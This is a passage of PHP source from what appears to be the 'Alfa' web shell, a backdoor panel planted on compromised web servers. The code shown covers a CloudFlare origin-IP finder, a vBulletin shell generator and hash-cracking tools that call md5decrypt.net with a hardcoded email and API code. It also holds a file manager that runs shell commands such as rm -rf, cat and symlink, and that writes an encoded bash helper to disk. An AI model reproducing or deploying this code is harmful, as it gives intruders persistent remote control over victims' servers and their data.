    if (preg_match('/cloudflare/i', $server)) {
      echo "\n[+] CloudFlare detected: {$server}\n
";
    } else {
      echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
    }
    echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n

";
    echo "[+] Searching for more IP addresses.\n\n

";
    for ($x = 0;$x < count($subs);$x++) {
      $site = $subs[$x] . $url;
      $ip = is_ipv4(gethostbyname($site));
      if ($ip == '(Null)') {
        continue;
      }
      echo "Trying {$site}: {$ip}\n
";
    }
    echo "\n[+] Finished.\n
";
  }
  echo '
';
  alfafooter();
}
function is_ipv4($ip) {
  return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s) {
  echo '
'.__pre().$s.'
';
}
function create_table($data) {
  echo '';
  foreach ($data as $key => $val) {
    $array = array();
    foreach ($val as $k => $v) {
      $array[$k] = $v;
    }
    echo "";
  }
  echo '
".$array['tdName']."
';
}
function alfaphp2xml() {
  alfahead();
  AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
  echo "
| Shell For vBulletin |
>'); return false;\" method='post'>






";
  if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
    echo __pre()."
';
  }
  echo '
';
  alfafooter();
}
function alfacpcrack() {
  alfahead();
  echo '
| Hash Tools |
| DeCrypter | | Hash Analyzer | 
';
  if ($_POST['alfa1'] == 'dec') {
    $algorithms = array('md5' => 'MD5','md4' => 'MD4','sha1' => 'SHA1','sha256' => 'SHA256','sha384' => 'SHA384','sha512' => 'SHA512','ntlm' => 'NTLM');
    echo '
| DeCrypter |




Decrypt Method:
  

';
    if ($_POST['alfa3'] == '>>') {
      $hash = $_POST['alfa2'];
      if (!empty($hash)) {
        $hash_type = $_POST['alfa4'];
        $email = "solevisible@gmail.com";
        $code = "7b9fa79f92c3cd96";
        $target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
        $resp = @file_get_contents($target);
        if ($resp == '') {
          $get = new AlfaCURL();
          $resp = $get->Send($target);
        }
        echo __pre().'
';
        switch ($resp) {
          case ('CODE ERREUR : 001'):echo "You exceeded the 400 allowed request per day";
            break;
          case ('CODE ERREUR : 003'):echo "Your request includes more than 400 hashes.";
            break;
          case ('CODE ERREUR : 004'):echo "The type of hash you provide in the argument hash_type doesn't seem to be valid";
            break;
          case ('CODE ERREUR : 005'):echo "The hash you provide doesn't seem to match with the type of hash you set.";
            break;
        }
        if (substr($resp, 0, 4) != 'CODE' && $resp != '') {
          echo "Result: ".$resp."";
        } elseif (substr($resp, 0, 4) != 'CODE') {
          echo "NoT Found
";
        }
        echo('
');
      }
    }
  }
  if ($_POST['alfa1'] == 'analyzer') {
    echo '
| Hash Analyzer |




Hash: 
  

';
    if ($_POST['alfa3'] == '>>') {
      $hash = $_POST['alfa2'];
      if (!empty($hash)) {
        $curl = new AlfaCURL();
        $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search");
        echo(__pre().'
');
        if (preg_match('#
(.*?)
#', $resp, $s)) {
          echo(''.$s[1].'');
        } else {
          echo('Not Found...!');
        }
        echo('

');
      }
    }
  }
  echo '
';
  alfafooter();
}
function alfafooter() {
  if (!isset($_POST['ajax'])) {
    echo "




Make File : 
 


Make Dir : 
 


Delete : 
 


Chmod : 
 






Change Dir : 
 


Read File : 
 






Execute :













Upload file: 











Sql Manager








0
Database


0
Options


0
Editor


0
Cgi Shell






";?>



= 1073741824) {
    return sprintf('%1.2f', $s / 1073741824). ' GB';
  } elseif ($s >= 1048576) {
    return sprintf('%1.2f', $s / 1048576) . ' MB';
  } elseif ($s >= 1024) {
    return sprintf('%1.2f', $s / 1024) . ' KB';
  } else {
    return $s . ' B';
  }
}
function alfaPerms($p) {
  if (($p & 0xC000) == 0xC000) {
    $i = 's​';
  } elseif (($p & 0xA000) == 0xA000) {
    $i = 'l​';
  } elseif (($p & 0x8000) == 0x8000) {
    $i = '-​';
  } elseif (($p & 0x6000) == 0x6000) {
    $i = 'b​';
  } elseif (($p & 0x4000) == 0x4000) {
    $i = 'd​';
  } elseif (($p & 0x2000) == 0x2000) {
    $i = 'c​';
  } elseif (($p & 0x1000) == 0x1000) {
    $i = 'p​';
  } else {
    $i = 'u​';
  }
  $i .= (($p & 0x0100) ? 'r​' : '-');
  $i .= (($p & 0x0080) ? 'w​' : '-');
  $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's​' : 'x​') : (($p & 0x0800) ? 'S​' : '-'));
  $i .= (($p & 0x0020) ? 'r​' : '-');
  $i .= (($p & 0x0010) ? 'w​' : '-');
  $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's​' : 'x​') : (($p & 0x0400) ? 'S​' : '-'));
  $i .= (($p & 0x0004) ? 'r​' : '-');
  $i .= (($p & 0x0002) ? 'w​' : '-');
  $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't​' : 'x​') : (($p & 0x0200) ? 'T​' : '-'));
  return $i;
}
function alfaPermsColor($f, $isbash = false) {
  $class = "";
  $num = "";
  $human = "";
  if ($isbash) {
    $class = $f["class"];
    $num = $f["num"];
    $human = $f["human"];
  } else {
    $num = substr(sprintf('%o', @fileperms($f)), -4);
    $human = alfaPerms(@fileperms($f));
    if (!@is_readable($f)) {
      $class = "main_red_perm";
    } elseif (!@is_writable($f)) {
      $class = "main_white_perm";
    } else {
      $class = "main_green_perm";
    }
  }
  return ''.$num.' >> '.$human.'';
}
if (!function_exists("scandir")) {
  function scandir($dir) {
    $dh = opendir($dir);
    while (false !== ($filename = readdir($dh))) {
      $files[] = $filename;
    }
    return $files;
  }
}
function reArrayFiles($file_post) {
  $file_ary = array();
  $file_count = count($file_post['name']);
  $file_keys = array_keys($file_post);
  for ($i = 0; $i < $file_count; $i++) {
    foreach ($file_keys as $key) {
      $file_ary[$i][$key] = $file_post[$key][$i];
    }
  }
  return $file_ary;
}
function _alfa_can_runCommand($cgi = true, $cache = true) {
  if (isset($_COOKIE["alfa_canruncmd"]) && $cache) {
    return true;
  }
  if (strlen(alfaEx("whoami", false, $cgi)) > 0) {
    $_COOKIE["alfa_canruncmd"] = true;
    return true;
  }
  return false;
}
function _alfa_symlink($target, $link) {
  $phpsym = function_exists("symlink");
  if ($phpsym) {
    @symlink($target, $link);
  } else {
    alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  }
}
function _alfa_file_exists($file, $cgi = true) {
  if (@file_exists($file)) {
    return true;
  } else {
    if (strlen(alfaEx("ls -la '".addslashes($file)."'", false, $cgi)) > 0) {
      return true;
    }
  }
  return false;
}
function _alfa_file($file, $cgi = true) {
  $array = @file($file);
  if (!$array) {
    if (strlen(alfaEx("id", false, $cgi)) > 0) {
      $data = alfaEx('cat "'.addslashes($file).'"', false, $cgi);
      if (strlen($data) > 0) {
        return explode("\n", $data);
      } else {
        return false;
      }
    } else {
      return false;
    }
  } else {
    return $array;
  }
}
function _alfa_is_writable($file) {
  $check = false;
  $check = @is_writable($file);
  if (!$check) {
    if (_alfa_can_runCommand()) {
      $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
      if ($check == "yes") {
        $check = true;
      } else {
        $check = false;
      }
    }
  }
  return $check;
}
function _alfa_is_dir($dir, $mode = "-d") {
  $check = false;
  $check = @is_dir($dir);
  if ($mode == "-e") {
    $check = @is_file($dir);
  }
  if (!$check) {
    if (_alfa_can_runCommand()) {
      $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
      if ($check == "yes") {
        return true;
      } else {
        return false;
      }
    }
  }
  return $check;
}
function _alfa_load_ace_options($base) {
  return 'Theme: Language: Soft Wrap:  | Font Size:  |  | ';
}
function alfaFilesMan2() {
  alfahead();
  AlfaNum(8, 9, 10, 7, 6, 5, 4);
  echo '
';
  alfaFooter();
}
function copy_paste($c, $s, $d) {
  if (@is_dir($c.$s)) {
    @mkdir($d.$s);
    $h = @opendir($c.$s);
    while (($f = @readdir($h)) !== false) {
      if (($f != ".") and ($f != "..")) {
        copy_paste($c.$s.'/', $f, $d.$s.'/');
      }
    }
  } elseif (is_file($c.$s)) {
    @copy($c.$s, $d.$s);
  }
}
function alfaFilesMan() {
  if (!empty($_COOKIE['alfa_f'])) {
    $_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
  }
  if (!empty($_POST['alfa1'])) {
    switch ($_POST['alfa1']) {
      case 'uploadFile':
        $move_cmd_file = false;
        $alfa_canruncmd = false;
        if ($GLOBALS['glob_chdir_false']) {
          $alfa_canruncmd = _alfa_can_runCommand(true, true);
          $move_cmd_file = true;
        }
        if (_alfa_is_writable($GLOBALS['cwd'])) {
          $files = reArrayFiles($_FILES['f']);
          $ret_files = array();
          foreach ($files as $file) {
            if ($move_cmd_file && $alfa_canruncmd) {
              alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
            } else {
              if (@move_uploaded_file($file['tmp_name'], $file['name'])) {
                $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($file['name'])) : array("name" => "????");
                $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($file['name'])) : array("name" => "????");
                $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($file['name']) : "????");
                $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($file['name']) : "????");
                $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
                $file_perm = alfaPermsColor($file['name']);
                $file_size = @filesize($file['name']);
                $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
              }
            }
          }
          if (!$move_cmd_file) {
            echo json_encode($ret_files);
          }
        } else {
          echo "noperm";
          return;
        }
        if (!$move_cmd_file) {
          return;
        }
        break;
      case 'mkdir':
        $new_dir_cmd = false;
        if ($GLOBALS['glob_chdir_false']) {
          if (_alfa_can_runCommand(true, true)) {
            if (_alfa_is_writable($GLOBALS['cwd'])) {
              if (!_alfa_is_dir(trim($_POST['alfa2']))) {
                alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
                echo "";
              } else {
                echo "";
              }
            } else {
              echo "";
            }
          } else {
            echo "";
          }
        } else {
          if (_alfa_is_writable($GLOBALS['cwd'])) {
            if (!_alfa_is_dir(trim($_POST['alfa2']))) {
              if (!@mkdir(trim($_POST['alfa2']))) {
                echo "";
              } else {
                echo "";
              }
            } else {
              echo "";
            }
          } else {
            echo "";
          }
        }
        break;
      case 'delete':
        function deleteDir($path) {
          $path = (substr($path, -1) == '/') ? $path : $path.'/';
          $dh = @opendir($path);
          while (($item = @readdir($dh)) !== false) {
            $item = $path.$item;
            if ((basename($item) == "..") || (basename($item) == ".")) {
              continue;
            }
            $type = @filetype($item);
            if ($type == "dir") {
              deleteDir($item);
            } else {
              @unlink($item);
            }
          }
          @closedir($dh);
          @rmdir($path);
        }
        if (is_array(@$_POST['f'])) {
          foreach ($_POST['f'] as $f) {
            if ($f == '..') {
              continue;
            }
            $f = rawurldecode($f);
            if ($GLOBALS["glob_chdir_false"]) {
              if (_alfa_can_runCommand(true, true)) {
                alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
              }
            } else {
              alfaEx("rm -rf '".addslashes($f)."'", false, false);
              if (@is_dir($f)) {
                deleteDir($f);
              } else {
                @unlink($f);
              }
            }
          }
        }
        if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..') {
          deleteDir(rawurldecode(@$_POST['alfa2']));
          alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'", false, false);
        } else {
          @unlink(rawurldecode(@$_POST['alfa2']));
        }
        if ($GLOBALS["glob_chdir_false"]) {
          $source = rawurldecode(@$_POST['alfa2']);
          if ($source != '..' && !empty($source)) {
            if (_alfa_can_runCommand(true, true)) {
              alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
            }
          }
        }
        if (is_array($_POST['f'])) {
          return;
        }
        break;
      case 'paste':
        if ($_COOKIE['alfa_act'] == 'copy' && isset($_COOKIE['alfa_f'])) {
          foreach ($_COOKIE['alfa_f'] as $f) {
            copy_paste($_COOKIE['alfa_c'], $f, $GLOBALS['cwd']);
          }
        } elseif ($_COOKIE['alfa_act'] == 'move' && isset($_COOKIE['alfa_f'])) {
          function move_paste($c, $s, $d) {
            if (@is_dir($c.$s)) {
              @mkdir($d.$s);
              $h = @opendir($c.$s);
              while (($f = @readdir($h)) !== false) {
                if (($f != ".") and ($f != "..")) {
                  copy_paste($c.$s.'/', $f, $d.$s.'/');
                }
              }
            } elseif (@is_file($c.$s)) {
              @copy($c.$s, $d.$s);
            }
          }
          foreach ($_COOKIE['alfa_f'] as $f) {
            @rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
          }
        } elseif ($_COOKIE['alfa_act'] == 'zip' && isset($_COOKIE['alfa_f'])) {
          if (class_exists('ZipArchive')) {
            $zip = new ZipArchive();
            $zipX = "alfa_".rand(1, 1000).".zip";
            if ($zip->open($zipX, 1)) {
              @chdir($_COOKIE['alfa_c']);
              foreach ($_COOKIE['alfa_f'] as $f) {
                if ($f == '..') {
                  continue;
                }
                if (@is_file($_COOKIE['alfa_c'].$f)) {
                  $zip->addFile($_COOKIE['alfa_c'].$f, $f);
                } elseif (@is_dir($_COOKIE['alfa_c'].$f)) {
                  $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                  foreach ($iterator as $key => $value) {
                    $key = str_replace('\\', '/', realpath($key));
                    if (@is_dir($key)) {
                      if (in_array(substr($key, strrpos($key, '/') + 1), array('.', '..'))) {
                        continue;
                      }
                    } else {
                      $zip->addFile($key, $key);
                    }
                  }
                }
              }
              @chdir($GLOBALS['cwd']);
              $zip->close();
              __alert('>> '.$zipX.' << is created...');
            }
          }
        } elseif ($_COOKIE['alfa_act'] == 'unzip' && isset($_COOKIE['alfa_f'])) {
          if (class_exists('ZipArchive')) {
            $zip = new ZipArchive();
            foreach ($_COOKIE['alfa_f'] as $f) {
              if ($zip->open($_COOKIE['alfa_c'].$f)) {
                $zip->extractTo($_COOKIE['alfa_cwd']);
                $zip->close();
              }
            }
          }
        }
        unset($_COOKIE['alfa_f']);
        break;
      default:
        if (!empty($_POST['alfa1'])) {
          if (in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))) {
            __alfa_set_cookie('alfa_act', @$_POST['alfa1']);
            __alfa_set_cookie('alfa_f', @serialize($_POST['f']));
            __alfa_set_cookie('alfa_c', @$_POST['c']);
            return;
          }
        }
        break;
    }
  }
  $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
  if (preg_match("#(.*)\/\.\.#", $_POST['c'], $res)) {
    $path = explode('/', $res[1]);
    array_pop($path);
    $_POST['c'] = implode('/', $path);
  }
  $cmd_dir = false;
  if ($dirContent === false) {
    if (_alfa_can_runCommand(true, true)) {
      $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
      @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
      if (!isset($_COOKIE["alfachdir_bash"]) || @!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")) {
        $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
        $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa", $bash);
        __alfa_set_cookie("alfachdir_bash", "true");
        __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
      }
      $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd'])."'");
      $dirContent = json_decode($dirContent, true);
      if (is_array($dirContent)) {
        array_pop($dirContent);
        $cmd_dir = true;
      } else {
        $dirContent = false;
      }
    }
  }
  alfahead();
  AlfaNum(8, 9, 10, 7, 6, 5, 4);
  $count_dirContent = @count($dirContent);
  if ($count_dirContent > 300) {
    @$_COOKIE["alfa_limited_files"] = 100;
  }
  $alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
  $alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
  $alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
  $alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
  $files_page_count = 1;
  if ($alfa_limited_files > 0) {
    $files_page_count = ceil($count_dirContent / $alfa_limited_files);
    if ($files_page_count > 1) {
      $files_page_count++;
    }
  }
  echo '
Filter: Sort By: Direction:  limit: Files Count: '.($count_dirContent - 1).'
';
  if ($dirContent == false) {
    echo '

!!! Access Denied !!!

';
    alfaFooter();
    return;
  }
  global $sort;
  $sort = array('name', 1);
  if (isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])) {
    $sort[0] = $_COOKIE["alfa_sort_by"];
  }
  if (!empty($_POST['alfa1'])) {
    if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) {
      $sort = array($match[1], (int)$match[2]);
    }
  }
  if ($alfa_files_page_number > ($files_page_count - 1)) {
    $alfa_files_page_number = 1;
  }
  $checkbox_rand = rand(11111, 99999);
  echo "
";
  $dirs = $files = array();
  $n = $count_dirContent;
  if ($n > $alfa_limited_files && $alfa_limited_files > 0) {
    $n = ($alfa_limited_files * $alfa_files_page_number);
    if ($n > $count_dirContent) {
      $n = $count_dirContent;
    }
  }
  $i = 0;
  if ($alfa_limited_files > 0 && $alfa_files_page_number > 1) {
    $i = $alfa_limited_files * ($alfa_files_page_number - 1);
  }
  $page_builder = get_pagination_links($alfa_files_page_number, $files_page_count - 1);
  $cmd_dir_backp = "";
  for (;$i < $n;$i++) {
    if ($cmd_dir) {
      $filename = $dirContent[$i]["name"];
      $file_owner = $dirContent[$i]["owner"];
      $file_group = $dirContent[$i]["group"];
      $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
      $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"],"num" => $dirContent[$i]["permnum"],"human" => $dirContent[$i]["permhuman"]), true);
      $file_size = $dirContent[$i]["size"];
      if (substr($dirContent[$i]["name"], 0, 1) == "/") {
        $file_path = $dirContent[$i]["name"];
        $dirContent[$i]["name"] = "..";
        $filename = $dirContent[$i]["name"];
      } else {
        $file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
      }
    } else {
      $filename = $dirContent[$i];
      $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)) : array("name" => "????");
      $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)) : array("name" => "????");
      $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($GLOBALS['cwd'].$filename) : "????");
      $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($GLOBALS['cwd'].$filename) : "????");
      $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
      $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
      $file_size = @filesize($GLOBALS['cwd'].$filename);
      $file_path = $GLOBALS['cwd'].$filename;
    }
    $tmp = array('name' => $filename,
    'path' => $file_path,
    'modify' => $file_modify,
    'perms' => $file_perm,
    'size' => $file_size,
    'owner' => $file_owner,
    'group' => $file_group
    );
    if ($filename == ".." && !$cmd_dir) {
      $tmp["path"] = str_replace("\\", "/", realpath($file_path));
    }
    if (!$cmd_dir) {
      if (@is_file($file_path)) {
        $arr_mrg = array('type' => 'file');
        if (@is_link($file_path)) {
          $arr_mrg["link"] = readlink($tmp['path']);
        }
        $files[] = array_merge($tmp, $arr_mrg);
      } elseif (@is_link($file_path)) {
        $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
      } elseif (@is_dir($file_path) && ($filename != ".")) {
        $dirs[] = array_merge($tmp, array('type' => 'dir'));
      }
    } else {
      if ($dirContent[$i]["type"] == "file") {
        $files[] = array_merge($tmp, array('type' => 'file'));
      } else {
        if ($dirContent[$i]["name"] != ".") {
          $dirs[] = array_merge($tmp, array('type' => 'dir'));
        }
      }
    }
  }
  $GLOBALS['sort'] = $sort;
  function alfaCmp($a, $b) {
    if ($GLOBALS['sort'][0] != 'size') {
      return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
    } else {
      return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
    }
  }
  usort($files, "alfaCmp");
  usort($dirs, "alfaCmp");
  if (isset($_COOKIE["alfa_filesman_direction"]) && !empty($_COOKIE["alfa_filesman_direction"])) {
    if ($_COOKIE["alfa_filesman_direction"] == 'desc') {
      $files = array_reverse($files);
      $dirs = array_reverse($dirs);
    }
  }
  $files = array_merge($dirs, $files);
  $l = 0;
  $cc = 0;
  foreach ($files as $f) {
    $f['name'] = htmlspecialchars($f['name']);
    $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8').'...' : $f['name'];
    $checkbox = 'checkbox_'.$checkbox_rand.$cc;
    $raw_name = rawurlencode($f['name']);
    $icon = $GLOBALS['DB_NAME']['show_icons'] ? '' : '';
    $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';

    echo '';
    $l = $l ? 0 : 1;
    $cc++;
  }
  echo "
NameSizeModifyOwner/GroupPermissionsActions
'.$icon.''.(($f['type'] == 'file') ? (isset($f['link']) ? '[L] ' : '').alfaSize($f['size']) : $f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.
    $f['perms'].'R T'.(($f['type'] == 'file') ? ' E D' : '').' X 







".$page_builder."
";
  alfafooter();
}
function get_pagination_links($current_page, $total_pages) {
  $links = "";
  if ($total_pages >= 1 && $current_page <= $total_pages) {
    $links .= "<<";
    $selected_page = "";
    if ($current_page == 1) {
      $selected_page = " active-page-number";
    }
    $links .= "1";
    $i = max(2, $current_page - 5);
    if ($i > 2) {
      $links .= "...";
    }
    for (; $i < min($current_page + 6, $total_pages); $i++) {
      if ($i == $current_page) {
        $selected_page = " active-page-number";
      } else {
        $selected_page = "";
      }
      $links .= "{$i}";
    }
    if ($i != $total_pages) {
      $links .= "...";
    }
    $selected_page = " last-page-number";
    if ($current_page == $total_pages) {
      $selected_page .= " active-page-number";
    }
    $links .= "{$total_pages}";
    $links .= ">>";
  }
  return $links;
}
function alfaFilesTools() {
  alfahead();
  echo '
';
  if (isset($_POST['alfa1'])) {
    $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  }
  $alfa1_decoded = $_POST['alfa1'];
  $chdir_fals = false;
  if (!@chdir($_POST['c'])) {
    $chdir_fals = true;
    $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
    $alfa_canruncmd = _alfa_can_runCommand(true, true);
    if ($alfa_canruncmd) {
      $slashed_alfa1 = addslashes($_POST['alfa1']);
      $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
      $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
    }
  }
  if ($_POST['alfa2'] == 'auto') {
    if (is_array(@getimagesize($_POST['alfa1']))) {
      $_POST['alfa2'] = 'image';
    } else {
      $_POST['alfa2'] = 'view';
      if ($chdir_fals) {
        if ($alfa_canruncmd) {
          $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
          $mimetype = $mime[1];
          if (!empty($mimetype)) {
            if (strstr($mimetype, "image")) {
              $_POST['alfa2'] = 'image';
            }
          }
        }
      }
    }
  }
  if ($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])) {
    $rename_cache = $_POST['alfa3'];
  }
  if (@$_POST['alfa2'] == 'mkfile') {
    $_POST['alfa1'] = trim($_POST['alfa1']);
    if ($chdir_fals && $alfa_canruncmd) {
      if (_alfa_is_writable($_POST["c"])) {
        alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
        $_POST['alfa2'] = "edit";
      }
    }
    if (!@file_exists($_POST['alfa1'])) {
      $fp = @fopen($_POST['alfa1'], 'w');
      if ($fp) {
        $_POST['alfa2'] = "edit";
        fclose($fp);
      }
    } else {
      $_POST['alfa2'] = "edit";
    }
  }
  if (!_alfa_file_exists(@$_POST['alfa1'])) {
    echo __pre()."
!...FILE DOEST NOT EXITS...!
";
    alfaFooter();
    return;
  }
  if ($chdir_fals) {
    $filesize = $file_info[3];
    $uid["name"] = $file_info[1];
    $gid["name"] = $file_info[2];
    $permcolor = alfaPermsColor(array("class" => $perm_color_class,"num" => $file_info[5],"human" => $file_info[6]), true);
  } else {
    $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
    $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
    if (!$uid && !$gid) {
      $uid['name'] = function_exists("fileowner") ? @fileowner($_POST['alfa1']) : '';
      $gid['name'] = function_exists("filegroup") ? @filegroup($_POST['alfa1']) : '';
    }
    $permcolor = alfaPermsColor($_POST['alfa1']);
    $filesize = @filesize($_POST['alfa1']);
    if (!isset($uid['name'],$gid['name']) || empty($uid['name']) || empty($gid['name'])) {
      if (_alfa_can_runCommand()) {
        list($uid['name'], $gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
      }
    }
  }
  if (substr($_POST['alfa1'], 0, 7) == "phar://") {
    $alfa_file_directory = $_POST['alfa1'];
  } else {
    $alfa_file_directory = str_replace("//", "/", ($chdir_fals ? "" : $_POST['c'].'/').$_POST['alfa1']);
  }
  echo '
Name: '.htmlspecialchars(basename($alfa1_decoded)).' Size: '.alfaSize($filesize).' Permission: '.$permcolor.' Owner/Group: '.$uid['name'].'/'.$gid['name'].' Directory: '.dirname($alfa_file_directory).'
';
  if (empty($_POST['alfa2'])) {
    $_POST['alfa2'] = 'view';
  }
  if (!_alfa_is_dir($_POST['alfa1'])) {
    $m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
    $ftype = "file";
  } else {
    $m = array('Chmod', 'Rename', 'Touch');
    $ftype = "dir";
  }
  echo('';
  switch ($_POST['alfa2']) {
    case 'view':case 'edit':
      @chdir($_POST['c']);
      $disabled_btn = "";
      if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1'])) {
        $disabled_btn = "disabled=disabled";
        $disabled_btn_style = 'background: #ff0000;color: #fff;';
      }
      if (!empty($_POST['alfa3'])) {
        $_POST['alfa3'] = substr($_POST['alfa3'], 1);
        $time = @filemtime($_POST['alfa1']);
        $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
        if ($chdir_fals && $alfa_canruncmd) {
          $rname = $alfa1_decoded;
          $randname = $rname.rand(111, 9999);
          $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
          if ($fp = @__write_file($filepath, $_POST['alfa3'])) {
            alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
          }
        }
        if ($fp) {
          echo 'Saved!
';
          @touch($_POST['alfa1'], $time, $time);
        }
      }
      echo '
'._alfa_load_ace_options("editor").'  
';
      echo htmlspecialchars(__read_file($_POST['alfa1']));
      echo '
';
      break;
    case 'highlight':
